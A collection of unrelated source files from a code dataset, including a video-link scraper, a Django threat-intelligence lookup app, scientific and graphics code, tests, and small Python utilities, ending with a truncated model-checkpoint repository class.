+{"seq_id":"605495057","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*- \nimport re\nimport scrapy\n\nclass StreamSpider(scrapy.Spider):\n    name = \"stream\"\n    start_urls = [\"http://streamjav.net/\"]\n\n    def parse(self, response):\n        # Parse the image addresses\n        for item in response.css(\"div.tn-bxitem\"):\n            video_src = item.css('a::attr(href)').extract_first()\n            if video_src is not None:\n                yield response.follow(video_src, callback=self.parse_video)\n\n    # Parse the video address\n    def parse_video(self, response):\n        iframe_str = response.css('div#embed>input::attr(value)').extract_first()\n        pattern = re.compile(r'src=\\\"([^\\\"]+)\\\"')\n        m = pattern.findall(iframe_str)\n        if m[0] is not None:\n            yield response.follow(m[0], callback=self.parse_video_url)\n\n    # Parse out the mp4 url\n    def parse_video_url(self, response):\n        body = response.text\n        pattern = re.compile(r'file:\\s*\\\"([^\\\"]+)\\\"')\n        m = pattern.findall(body)\n        if m[0] is not None:\n            with open('urls.text', 'a+') as f:\n                f.writelines(m[0])\n            self.log(m[0])\n","sub_path":"stramjav/stramjav/spiders/stream_spider.py","file_name":"stream_spider.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"7637812","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'basicsite'\nurlpatterns = [\n    path('', views.index, name='home'),\n    path('for-sale/', views.sales_list, name='for_sale'),\n    path('for-sale////', views.bike_detail, name='bike_detail'),\n    path('hello', views.hello, name='hello')\n]\n\n","sub_path":"rayjays/basicsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"224461363","text":"import os\n\nimport numpy\n\nfrom grit.files.reads import Reads, MergedReads, determine_read_pair_params\nfrom grit.frag_len import build_normal_density\n\nclass ChIPSeqReads(Reads):\n    def __repr__(self):\n        paired = 'paired' if self.reads_are_paired else 'unpaired'\n        # repr text reconstructed; the original angle-bracketed string was lost to markup stripping\n        return \"<ChIPSeqReads %s, frag_len %s>\" % (paired, self.frag_len)\n\n    def build_unpaired_reads_fragment_coverage_array( \n        self, chrm, start, stop, window_size=None ):\n        if window_size == None:\n            window_size = self.frag_len\n        assert stop >= start\n        full_region_len = stop - start + 1\n        cvg = numpy.zeros(full_region_len)\n        for rd, strand in self.iter_reads_and_strand(chrm, start, stop):\n            if strand == '+': \n                rd_start = rd.pos\n                rd_stop = rd.pos + window_size\n            elif strand == '-': \n                rd_start = rd.aend - window_size\n                rd_stop = rd.aend\n            else:\n                assert False\n            cvg[max(0, rd_start-start):max(0, rd_stop-start)] += (\n                1.0/(rd_stop-rd_start+1))\n\n        return cvg\n\n    \n    def init(self, \n             reverse_read_strand=None, reads_are_stranded=None,\n             pairs_are_opp_strand=None, reads_are_paired=None,\n             frag_len_dist=None): \n        assert self.is_indexed()\n\n        #\"ChIPSeq.GM12878.CTCF.BSID-ENCBS195XMM.REPID-1_1.EXPID-ENCSR000DRZ.bam\"\n        #data = os.path.basename(self.filename).split('.')\n        #self.biosample = data[1] \n        #self.factor = data[2]\n        #self.bsid = data[3].split(\"-\")[1]\n        #self.experiment_id = data[5].split(\"-\")[1]\n        #self.repid = data[4].split(\"-\")[1]\n\n        #self.id = \"%s.%s.%s\" % (self.factor, self.bsid, self.repid)\n        \n        reads_are_stranded = True\n        \n        if frag_len_dist == None:\n            frag_len_dist = build_normal_density(\n                fl_min=100, fl_max=200, mean=150, sd=25)\n        self.frag_len_dist = frag_len_dist\n        self.frag_len = int(frag_len_dist.mean_fragment_length())\n        \n        read_pair_params = determine_read_pair_params(self)\n        \n        # set whether the reads are paired or not\n        if reads_are_paired in ('auto', None):\n            if 'paired' in read_pair_params:\n                reads_are_paired = True \n                assert 'unpaired' in read_pair_params\n            else:\n                reads_are_paired = False\n        \n        if pairs_are_opp_strand in ('auto', None):\n            if reads_are_paired or ('same_strand' in read_pair_params):\n                pairs_are_opp_strand = False\n            else:\n                pairs_are_opp_strand = True\n        \n        reverse_read_strand = None\n        \n        Reads.init(self, reads_are_paired, pairs_are_opp_strand, \n                   reads_are_stranded, reverse_read_strand )\n\n        # we save these for fast reloads\n        self._init_kwargs = {\n            'reverse_read_strand': reverse_read_strand, \n            'reads_are_stranded': reads_are_stranded, \n            'pairs_are_opp_strand': pairs_are_opp_strand, \n            'reads_are_paired': reads_are_paired\n        }\n        \n        return self\n\ndef get_chipseq_experiment(ENCODE_exp_ID):\n    pass\n","sub_path":"pyTFbindtools/DNABindingProteins.py","file_name":"DNABindingProteins.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"649915059","text":"#-*- coding:utf-8 -*-\n# author:29557\n# datetime:2019/2/12 10:24\n# software: PyCharm\n\nimport os\n\nfile_path = \"test.py\"\n(filepath, tempfilename) = os.path.split(file_path)\n(filename, 
extension) = os.path.splitext(tempfilename)\nprint(filepath,tempfilename)\nprint(filename, extension)","sub_path":"test/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230101143","text":"import csv\nimport json\nimport datetime\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\nfrom .forms import SubmissionForm\nfrom .models import IndicatorRecord, TaskTracker\nfrom core.utilities import time_jump\n\nfrom celery.result import GroupResult\nfrom braces.views import LoginRequiredMixin\n\n\nclass PivotManager(LoginRequiredMixin, View):\n\n login_url = \"login\"\n redirect_unauthenticated_users = True\n\n template_name = 'pivoteer/pivoteer.html'\n\n def __init__(self):\n self.template_vars = {'SubmissionForm': SubmissionForm}\n\n def get(self, request):\n return render(request, self.template_name, self.template_vars)\n\n def post(self, request):\n\n task_tracking = {}\n submitted_form = SubmissionForm(request.POST)\n current_time = datetime.datetime.utcnow()\n desired_time = time_jump(hours=-24)\n\n if submitted_form.is_valid():\n recent_tasks = submitted_form.check_recent_tasks(desired_time)\n\n # If a recent task exists, use that one instead\n if recent_tasks:\n task_tracking['id'] = recent_tasks.group_id\n else:\n new_task = submitted_form.create_new_task(current_time)\n\n if new_task:\n task_tracking['id'] = new_task.id\n else:\n task_tracking[\"errors\"] = \"Unexpected Failure\"\n\n else: # pass form errors back to user from async request\n task_tracking[\"errors\"] = submitted_form.errors\n\n json_response = json.dumps(task_tracking)\n return HttpResponse(json_response, content_type=\"application/json\")\n\n\n# Check if task completed\n# https://zapier.com/blog/async-celery-example-why-and-how/\nclass CheckTask(LoginRequiredMixin, View):\n\n login_url = \"login\"\n redirect_unauthenticated_users = True\n\n template_name = \"pivoteer/UnknownRecords.html\"\n\n def __init__(self):\n self.template_vars = {}\n\n def post(self, request):\n\n task = request.POST['task_id']\n res = GroupResult.restore(task)\n\n if res and not res.ready():\n return HttpResponse(json.dumps({\"status\": \"loading\"}), content_type=\"application/json\")\n\n # Task completion allows for origin information to be pulled\n try:\n task_origin = TaskTracker.objects.get(group_id=task)\n record_type = task_origin.type\n indicator = task_origin.keyword\n\n except MultipleObjectsReturned:\n task_origin = TaskTracker.objects.filter(group_id=task).latest('date')\n record_type = task_origin.type\n indicator = task_origin.keyword\n\n except ObjectDoesNotExist:\n record_type = None\n indicator = None\n\n # Pull data according to the record type\n if record_type == \"Recent\":\n\n self.template_name = \"pivoteer/RecentRecords.html\"\n\n # Current hosting records\n host_record = IndicatorRecord.objects.recent_hosts(indicator)\n self.template_vars[\"current_hosts\"] = host_record\n\n # Current WHOIS record\n whois_record = IndicatorRecord.objects.recent_whois(indicator)\n self.template_vars[\"current_whois\"] = whois_record\n\n elif record_type == \"Historical\":\n\n self.template_name = \"pivoteer/HistoricalRecords.html\"\n\n # Historical hosting records\n host_records = IndicatorRecord.objects.historical_hosts(indicator, request)\n 
self.template_vars[\"hosting_records\"] = host_records\n\n # Historical WHOIS records\n whois_record = IndicatorRecord.objects.historical_whois(indicator)\n self.template_vars[\"historical_whois\"] = whois_record\n\n elif record_type == \"Malware\":\n\n self.template_name = \"pivoteer/MalwareRecords.html\"\n\n malware_records = IndicatorRecord.objects.malware_records(indicator)\n self.template_vars[\"malware_records\"] = malware_records\n\n self.template_vars[\"origin\"] = indicator\n return render(request, self.template_name, self.template_vars)\n\n\nclass ExportRecords(LoginRequiredMixin, View):\n\n login_url = \"login\"\n redirect_unauthenticated_users = True\n\n def __init__(self):\n\n # Create the HttpResponse object with the appropriate CSV header.\n self.response = HttpResponse(content_type='text/csv')\n self.response['Content-Disposition'] = 'attachment; filename=\"exported_records.csv\"'\n self.writer = csv.writer(self.response)\n\n def get(self, request):\n indicator = request.GET.get('indicator', '')\n filtering = request.GET.get('filter', '')\n\n if indicator and filtering == '':\n self.export_recent(indicator)\n self.export_historical(indicator, request)\n self.export_malware(indicator)\n\n elif indicator and filtering == 'recent':\n self.export_recent(indicator)\n\n elif indicator and filtering == 'historical':\n self.export_historical(indicator, request)\n\n elif indicator and filtering == 'malware':\n self.export_malware(indicator)\n\n return self.response\n\n def export_recent(self, indicator):\n\n hosts = IndicatorRecord.objects.recent_hosts(indicator)\n whois = IndicatorRecord.objects.recent_whois(indicator)\n\n if hosts:\n self.line_separator()\n self.writer.writerow([\"Date\", \"Source\", \"IP\", \"Domain\", \"IP Location\"])\n\n for host in hosts:\n entry = [host.info_date, host.info_source,\n host.info['ip'], host.info['domain'], host.info['geo_location']]\n\n self.writer.writerow(entry)\n\n if whois:\n self.line_separator()\n self.writer.writerow([\"Lookup Date\", \"WHOIS Information\"])\n self.writer.writerow([whois['info_date'], whois['info']])\n\n def export_historical(self, indicator, request):\n\n hosts = IndicatorRecord.objects.historical_hosts(indicator, request)\n whois = IndicatorRecord.objects.historical_whois(indicator)\n\n if hosts:\n print(hosts)\n self.line_separator()\n self.writer.writerow([\"Date\", \"Source\", \"IP\", \"Domain\", \"IP Location\"])\n\n for host in hosts:\n entry = [host.info_date, host.info_source,\n host.info['ip'], host.info['domain'], host.info['geo_location']]\n\n self.writer.writerow(entry)\n\n if whois:\n self.line_separator()\n self.writer.writerow(['First Seen / Last Seen', 'WHOIS Information'])\n\n for record in whois:\n self.writer.writerow([str(record['earliest']) + \" / \" + str(record['latest']), record['info']])\n\n def export_malware(self, indicator):\n\n malware = IndicatorRecord.objects.malware_records(indicator)\n\n if malware:\n self.line_separator()\n self.writer.writerow([\"Date\", \"Source\", \"Indicator\", \"MD5\", \"SHA1\", \"SHA256\", \"Report Link\"])\n\n for record in malware:\n entry = [record.info_date, record.info_source, record.info['indicator'], record.info['md5'],\n record.info['sha1'], record.info['sha256'], record.info['link']]\n\n self.writer.writerow(entry)\n\n def line_separator(self):\n 
self.writer.writerow([])\n","sub_path":"pivoteer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"172859309","text":"from __future__ import absolute_import\n\nfrom django.conf import settings\nfrom django.utils import six\nfrom importlib import import_module\nfrom django import forms\n\n\ndef load_widget_classes(widgets):\n\n _widgets = []\n\n def get_class_from_string(widget):\n mod = '.'.join(widget.split('.')[0:-1])\n cls_name = widget.split('.')[-1]\n return mod, cls_name\n\n for widget in widgets:\n\n kwargs = {}\n\n # load class from strings\n if isinstance(widget, six.string_types):\n try:\n mod, cls_name = get_class_from_string(widget)\n WidgetCls = getattr(import_module(mod), cls_name)\n except Exception as e:\n raise e\n elif isinstance(widget, tuple):\n try:\n mod, cls_name = get_class_from_string(widget[0])\n if len(widget) > 1:\n kwargs.update(widget[1])\n WidgetCls = getattr(import_module(mod), cls_name)\n except Exception as e:\n raise Exception('%s: %s' % (mod, e))\n else:\n WidgetCls = widget\n\n _widgets.append(WidgetCls)\n\n return _widgets\n\n\ndef get_all_widget_classes():\n \"\"\"returns collected Leonardo Widgets\n\n if not declared in settings is used __subclasses__\n which not supports widget subclassing\n\n \"\"\"\n from leonardo.module.web.models import Widget\n _widgets = getattr(settings,\n 'WIDGETS', Widget.__subclasses__())\n widgets = []\n if isinstance(_widgets, dict):\n for group, widget_cls in six.iteritems(_widgets):\n widgets.extend(widget_cls)\n elif isinstance(_widgets, list):\n widgets = _widgets\n return load_widget_classes(widgets)\n\n\ndef get_grouped_widgets(feincms_object, request=None):\n '''returns tuple(choices, grouped, ungrouped)\n\n requires feincms_object for getting content types\n\n request optionaly for checking permissions, but not required\n\n grouped = {'web': (id, label, icon)}\n '''\n\n grouped = {}\n ungrouped = []\n choices = []\n\n for ct in feincms_object._feincms_content_types:\n # Skip cts that we shouldn't be adding anyway\n opts = ct._meta\n # check permissions\n if request and request.user:\n from django.contrib.auth import get_permission_codename\n perm = opts.app_label + \".\" + \\\n get_permission_codename('add', opts)\n if not request.user.has_perm(perm):\n continue\n\n ct_info = ('.'.join([ct._meta.app_label,\n ct.__name__.lower()]),\n ct._meta.verbose_name,\n ct.get_widget_icon)\n if hasattr(ct, 'optgroup'):\n if ct.optgroup in grouped:\n grouped[ct.optgroup].append(ct_info)\n else:\n grouped[ct.optgroup] = [ct_info]\n else:\n ungrouped.append(ct_info)\n choices.append(ct_info)\n\n return choices, grouped, ungrouped\n\n\ndef find_widget_class(name):\n\n for w_cls in get_all_widget_classes():\n if name.lower() in w_cls.__name__.lower():\n return w_cls\n return None\n\n\ndef get_htmltext_widget():\n '''Returns the default widget\n for html text fields\n '''\n\n return getattr(settings,\n 'LEONARDO_HTMLTEXT_WIDGET',\n forms.Textarea\n )\n","sub_path":"leonardo/utils/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"171028418","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.arrays import vbo\nimport numpy as np\nfrom HVertexData2D import HVertexData2D\nfrom HTexture import HTexture\n\nclass 
HSpriteSheet(HTexture):\n    def __init__(self, *args, **kwargs):\n        super().__init__()\n        \n        self.mVertexDataBuffer = None\n        self.mIndexBuffers = None\n        \n        self.mClips = []\n        \n    def addClipSprite(self, newClip):\n        self.mClips.append(newClip)\n        return len(self.mClips) - 1\n    \n    def getClip(self, index):\n        return self.mClips[index]\n    \n    def generateDataBuffer(self):\n        if self.mTextureID != 0 and len(self.mClips) > 0:\n            totalSprites = len(self.mClips)\n            vertexData = []\n            vertexDataBytes = b''\n            for i in range(totalSprites * 4):\n                vertexData.append(HVertexData2D())\n            self.vertexDataSize = vertexData[0].size()\n            self.vertexDataTexOffset = vertexData[0].texOffset()\n            self.vertexDataPosOffset = vertexData[0].posOffset()\n            \n            self.mIndexBuffers = []\n            spriteIndices = np.arange(4, dtype=GLuint)\n            for i in range(totalSprites):\n                if i != 0:\n                    spriteIndices += 4\n                # Top left\n                vertexData[ spriteIndices[ 0 ] ].position.x = -self.mClips[ i ].w / 2.\n                vertexData[ spriteIndices[ 0 ] ].position.y = -self.mClips[ i ].h / 2.\n\n                vertexData[ spriteIndices[ 0 ] ].texCoord.s = (self.mClips[ i ].x) / self.mTextureWidth\n                vertexData[ spriteIndices[ 0 ] ].texCoord.t = (self.mClips[ i ].y) / self.mTextureHeight\n\n                # Top right\n                vertexData[ spriteIndices[ 1 ] ].position.x = self.mClips[ i ].w / 2.\n                vertexData[ spriteIndices[ 1 ] ].position.y = -self.mClips[ i ].h / 2.\n\n                vertexData[ spriteIndices[ 1 ] ].texCoord.s = (self.mClips[ i ].x + self.mClips[ i ].w) / self.mTextureWidth\n                vertexData[ spriteIndices[ 1 ] ].texCoord.t = (self.mClips[ i ].y) / self.mTextureHeight\n\n                # Bottom right\n                vertexData[ spriteIndices[ 2 ] ].position.x = self.mClips[ i ].w / 2.\n                vertexData[ spriteIndices[ 2 ] ].position.y = self.mClips[ i ].h / 2.\n\n                vertexData[ spriteIndices[ 2 ] ].texCoord.s = (self.mClips[ i ].x + self.mClips[ i ].w) / self.mTextureWidth\n                vertexData[ spriteIndices[ 2 ] ].texCoord.t = (self.mClips[ i ].y + self.mClips[ i ].h) / self.mTextureHeight\n\n                # Bottom left\n                vertexData[ spriteIndices[ 3 ] ].position.x = -self.mClips[ i ].w / 2.\n                vertexData[ spriteIndices[ 3 ] ].position.y = self.mClips[ i ].h / 2.\n\n                vertexData[ spriteIndices[ 3 ] ].texCoord.s = (self.mClips[ i ].x) / self.mTextureWidth\n                vertexData[ spriteIndices[ 3 ] ].texCoord.t = (self.mClips[ i ].y + self.mClips[ i ].h) / self.mTextureHeight\n            \n                for i in range(4):\n                    vertexDataBytes += vertexData[ spriteIndices[ i ] ].tostring()\n            \n                indexBuffer = vbo.VBO(data=spriteIndices.tostring(), usage='GL_STATIC_DRAW', target='GL_ELEMENT_ARRAY_BUFFER')\n                self.mIndexBuffers.append(indexBuffer)\n            \n            self.mVertexDataBuffer = vbo.VBO(data=vertexDataBytes, usage='GL_STATIC_DRAW', target='GL_ARRAY_BUFFER')\n            \n        elif self.mTextureID == 0:\n            print('No texture to render with!')\n            return False\n        elif len(self.mClips) <= 0:\n            print('No clips to generate vertex data from!')\n            return False\n        return True\n    \n    def freeSheet(self):\n        if self.mVertexDataBuffer is not None:\n            self.mVertexDataBuffer.delete()\n            self.mVertexDataBuffer = None\n        \n        if self.mIndexBuffers is not None:\n            for buf in self.mIndexBuffers:  # fixed: was self.mIndexBuffer, an undefined attribute\n                buf.delete()\n            self.mIndexBuffers = None\n        \n        self.mClips = []\n    \n    def freeTexture(self):\n        self.freeSheet()\n        super().freeTexture()\n    \n    def renderSprite(self, index):\n        if self.mVertexDataBuffer is not None:\n            glBindTexture(GL_TEXTURE_2D, self.mTextureID)\n            glEnableClientState(GL_VERTEX_ARRAY)\n            glEnableClientState(GL_TEXTURE_COORD_ARRAY)\n            self.mVertexDataBuffer.bind()\n            glTexCoordPointer(2, GL_FLOAT, self.vertexDataSize, self.mVertexDataBuffer + 
self.vertexDataTexOffset)\n glVertexPointer(2, GL_FLOAT, self.vertexDataSize, self.mVertexDataBuffer + self.vertexDataPosOffset)\n \n self.mIndexBuffers[index].bind()\n glDrawElements( GL_QUADS, 4, GL_UNSIGNED_INT, None )\n \n glDisableClientState( GL_TEXTURE_COORD_ARRAY )\n glDisableClientState( GL_VERTEX_ARRAY )","sub_path":"OpenGL/lazy_foo/Lesson 19/HSpriteSheet.py","file_name":"HSpriteSheet.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493118631","text":"# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for `utils.py`.\"\"\"\n\nfrom unittest import mock\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\nimport jax\n\nfrom optax._src import utils\n\n\nclass ScaleGradientTest(parameterized.TestCase):\n\n @parameterized.product(inputs=[-1., 0., 1.], scale=[-0.5, 0., 0.5, 1., 2.])\n @mock.patch.object(jax.lax, 'stop_gradient', wraps=jax.lax.stop_gradient)\n def test_scale_gradient(self, mock_sg, inputs, scale):\n\n def fn(inputs):\n outputs = utils.scale_gradient(inputs, scale)\n return outputs ** 2\n\n grad = jax.grad(fn)\n self.assertEqual(grad(inputs), 2 * inputs * scale)\n if scale == 0.:\n mock_sg.assert_called_once_with(inputs)\n else:\n self.assertFalse(mock_sg.called)\n self.assertEqual(fn(inputs), inputs ** 2)\n\n @parameterized.product(scale=[-0.5, 0., 0.5, 1., 2.])\n def test_scale_gradient_pytree(self, scale):\n\n def fn(inputs):\n outputs = utils.scale_gradient(inputs, scale)\n outputs = jax.tree_map(lambda x: x ** 2, outputs)\n return sum(jax.tree_leaves(outputs))\n\n inputs = dict(a=-1., b=dict(c=(2.,), d=0.))\n\n grad = jax.grad(fn)\n grads = grad(inputs)\n jax.tree_map(lambda i, g: self.assertEqual(g, 2 * i * scale), inputs, grads)\n self.assertEqual(\n fn(inputs), sum(jax.tree_leaves(jax.tree_map(lambda x: x**2, inputs))))\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"optax/_src/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"465597750","text":"from pbge import Singleton\nimport color\n\nclass AegisOverlord(Singleton):\n\tname = \"Aegis Overlord Luna\"\n\tmecha_colors = (color.LunarGrey,color.AegisCrimson,color.LemonYellow,color.CeramicColor,color.LunarGrey)\n\nclass BladesOfCrihna(Singleton):\n\tname = \"the Blades of Crihna\"\n\tmecha_colors = (color.HeavyPurple,color.SeaGreen,color.PirateSunrise,color.Black,color.StarViolet)\n\nclass BoneDevils(Singleton):\n\tname = \"the Bone Devil Gang\"\n\tmecha_colors = (color.Black,color.Cream,color.BrightRed,color.Avocado,color.Terracotta)\n\nclass TerranDefenseForce(Singleton):\n\tname = \"the Terran Defense Force\"\n\tmecha_colors = 
(color.ArmyDrab,color.Olive,color.ElectricYellow,color.GullGrey,color.Terracotta)\n","sub_path":"gears/factions.py","file_name":"factions.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282246840","text":"from copy import copy\n\n\ndef puzzle_solver(a, b, aplusb, max_letters = None):\n \"\"\"Max letter is range of numbers you want to use\n eq. to solve some + more = money you need range of 10\n \"\"\"\n letters = set().union(a, b, aplusb)\n letters = list(letters)\n # print(letters, len(letters))\n if max_letters is not None:\n for _ in range(10 - max_letters):\n # adds letters to ocupy free space\n letters.append(' ')\n\n def make_val(word, comb):\n \"\"\"Makes a number from letters with given values\"\"\"\n val = 0\n for index, letter in enumerate(word[::-1]):\n if letter != ' ':\n val += comb.find(letter) * 10 ** index\n return val\n\n def check(comb):\n \"\"\"Checks if combination makes its job\"\"\"\n a_val = make_val(a, comb)\n b_val = make_val(b, comb)\n aplusb_val = make_val(aplusb, comb)\n return a_val + b_val == aplusb_val\n\n def gen_perms(k, S, U):\n \"\"\"Generates every possible permutation without repetiton\"\"\"\n\n for e in U:\n new_U = copy(U)\n new_U.remove(e)\n yield from gen_perms(k-1, S + e, new_U)\n\n if k == 0: # ok. no more letters\n if check(S):\n # combination S is valid\n yield S # solution found\n # # l\n # def gen_perms2(k, S, U):\n # \"\"\"Generates every possible permutation without repetiton\"\"\"\n #\n # for e in copy(U):\n # U.remove(e)\n # if k == 0: # ok. no more letters\n # if check(S):\n # # combination S is valid\n # yield S # solution found\n # else:\n # yield from gen_perms(k - 1, S + e, U)\n\n\n\n\n # it start here\n return gen_perms(len(letters), '', set(letters))\n\n\nif __name__ == '__main__':\n p = []\n counter = 1\n # for answer in puzzle_solver('send', 'more', 'money'):\n for answer in puzzle_solver('cat', 'dog', 'pig'):\n if answer not in p:\n print('{0:<3}'.format(counter), answer)\n counter += 1\n p.append(answer)\n\n\n\n","sub_path":"chapter4/puzzlesolver.py","file_name":"puzzlesolver.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"245820482","text":"from docx import Document\n\ndocument = Document('header.docx')\ndocument.add_page_break()\n\ndef Make_Table(rows_number):\n table = document.add_table(cols=1, rows=rows_number, style='Table Grid')\n for i in range(0,rows_number):\n cell = table.cell(i,0)\n cell.text = \"Hi\"\n i += 1\n document.save(\"Nessus-result.docx\")\nMake_Table(7)\n","sub_path":"Project/Ozuma_Nessus/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"441898168","text":"import sys\nsys.path.append('/home/danielle8farias/hello-world-python3/meus_modulos')\nfrom mensagem import ler_cabecalho\nfrom numeros import ler_num_int\n\nfrom equacoes_polinomiais.raizes_equacao_2_grau import equacao_seg_grau\nfrom equacoes_polinomiais.determina_equacao_2_grau import raizes\n\n\ndef equacoes():\n ler_cabecalho('equação do 2º grau')\n print('''\n 0- sair\n 1- determinar raízes de uma equação do 2º grau\n 2- determinar a equação do 2º grau\n ''')\n opcao = ler_num_int('Escolha uma das opções: ')\n print()\n if opcao == 1:\n equacao_seg_grau()\n elif opcao == 2:\n raizes()\n else:\n 
pass\n","sub_path":"calculadora_py/equacoes_polinomiais/main_equacao_2_grau.py","file_name":"main_equacao_2_grau.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195045791","text":"import logging\nimport uuid\nimport os\nfrom urllib.parse import urlencode\n\nfrom .. import entities, repositories, exceptions, miscellaneous\n\nlogger = logging.getLogger(name=__name__)\n\n\nclass Checkpoints:\n \"\"\"\n Checkpoints Repository\n \"\"\"\n\n def __init__(self, client_api, model=None, project=None, artifacts=None):\n self._client_api = client_api\n self._project = project\n self._model = model\n self._artifacts = artifacts\n\n ############\n # entities #\n ############\n ############\n @property\n def project(self):\n if self._project is None:\n try:\n self._project = repositories.Projects(client_api=self._client_api).get()\n except exceptions.NotFound:\n raise exceptions.PlatformException(\n error='2001',\n message='Missing \"project\". need to set a Project entity or use project.checkpoints repository')\n return self._project\n\n @project.setter\n def project(self, project):\n if not isinstance(project, entities.Project):\n raise ValueError('Must input a valid Project entity')\n self._project = project\n\n @property\n def artifacts(self):\n if self._artifacts is None:\n try:\n self._artifacts = repositories.Artifacts(client_api=self._client_api,\n project=self._project)\n except exceptions.NotFound:\n raise exceptions.PlatformException(\n error='2001',\n message='Missing \"artifacts\"')\n return self._artifacts\n\n @property\n def model(self):\n assert isinstance(self._model, entities.Model)\n return self._model\n\n ###########\n # methods #\n ###########\n def get(self, checkpoint_name=None, checkpoint_id=None):\n \"\"\"\n Get checkpoint object\n\n :param checkpoint_id:\n :param checkpoint_name:\n :return: checkpoint object\n \"\"\"\n\n if checkpoint_id is not None:\n success, response = self._client_api.gen_request(req_type=\"get\",\n path=\"/checkpoints/{}\".format(checkpoint_id))\n if not success:\n raise exceptions.PlatformException(response)\n checkpoint = entities.Checkpoint.from_json(client_api=self._client_api,\n _json=response.json(),\n project=self._project,\n model=self.model)\n elif checkpoint_name is not None:\n checkpoints = self.list(checkpoint_name=checkpoint_name)\n if len(checkpoints) == 0:\n raise exceptions.PlatformException(\n error='404',\n message='Checkpoint not found. 
Name: {}'.format(checkpoint_name))\n elif len(checkpoints) > 1:\n raise exceptions.PlatformException(\n error='400',\n message='More than one file found by the name of: {}'.format(checkpoint_name))\n checkpoint = checkpoints[0]\n else:\n raise exceptions.PlatformException(\n error='400',\n message='Checked out not found, must provide either checkpoint id or checkpoint name')\n\n return checkpoint\n\n def list(self, model_id=None, creator=None, checkpoint_name=None):\n \"\"\"\n List project checkpoints\n :return:\n \"\"\"\n url = '/checkpoints'\n query_params = {\n 'modelId': model_id,\n 'creator': creator,\n 'name': checkpoint_name\n }\n\n if self._project is not None:\n query_params['projects'] = self._project.id\n\n url += '?{}'.format(urlencode({key: val for key, val in query_params.items() if val is not None}, doseq=True))\n\n # request\n success, response = self._client_api.gen_request(req_type='get',\n path=url)\n if not success:\n raise exceptions.PlatformException(response)\n\n # return checkpoints list\n checkpoints = miscellaneous.List()\n for checkpoint in response.json()['items']:\n checkpoints.append(entities.Checkpoint.from_json(client_api=self._client_api,\n _json=checkpoint,\n project=self._project,\n model=self.model))\n return checkpoints\n\n def upload(self, checkpoint_name, local_path, description=None, project_id=None, scope='private'):\n \"\"\"\n Create a checkpoint in platform\n\n :param local_path: path of artifacts to upload\n :param checkpoint_name:\n :param description:\n :param project_id:\n :param scope: 'global'\n :return: Checkpoint Entity\n \"\"\"\n if project_id is None:\n project_id = self.project.id\n\n # upload artifacts\n artifacts = self.artifacts.upload(filepath=local_path,\n model_name=self.model.name,\n checkpoint_name='{}_{}'.format(checkpoint_name, str(uuid.uuid1())))\n # get dir item of the artifacts\n if isinstance(artifacts, list):\n if len(artifacts) == 0:\n raise ValueError('nothing uploaded')\n item = artifacts[0]\n elif isinstance(artifacts, entities.Item):\n item = artifacts\n else:\n raise ValueError('bad upload')\n filters = entities.Filters(field='filename', values=item.dir)\n filters.recursive = False\n filters.show_dirs = True\n pages = self.artifacts.dataset.items.list(filters=filters)\n if pages.items_count != 1:\n raise ValueError('cant find dir of artifacts item. 
